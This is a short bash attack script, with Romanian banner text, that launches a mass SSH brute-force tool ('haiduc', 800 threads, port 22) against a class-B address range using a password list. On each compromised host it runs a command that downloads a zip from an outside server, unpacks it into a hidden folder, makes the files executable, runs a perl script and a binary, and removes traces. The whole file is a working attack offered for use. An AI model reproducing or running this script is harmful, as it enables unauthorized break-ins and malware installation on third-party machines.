#!/bin/bash
# UnderNET viruz | © 2008-2017
# by bash
#
### Set conexiuni tool ###
passfile=pass
threads=800
port=22
#
WHI=''
BLK=''
RED=''
YEL=''
BLU=''
RES=''

if [ $# != 1 ]; then
        echo "${WHI}   Folosim: $0 <b class>${RES}"
        exit;
fi
echo "${BLK}                 Made in Moldova"
echo "               SSH   Brute Force"
echo "${BLU}              ..::${RED} BY Vitiusha ${BLU}::..  "
echo "${RED}[+]${BLK} Brute Pashol ${WHI}-> ${BLU} VIVA ${YEL}LA ${RED}MOLDOVA ${YEL}"
./haiduc $threads -b $1 $passfile $port "uname -a; cd /tmp; wget http://app.crek.net.br/sbz.zip;unzip sbz.zip;rm -rf sbz.tgz;cd .sbz;chmod +x *;perl be;rm -rf be;./rand "
sleep 60
sleep 60
pkill haiduc
sleep 2
pkill haiduc
pkill haiduc
sleep 2
echo "${RED}[+]${BLK} Brutele TERMINAT.${RES}"

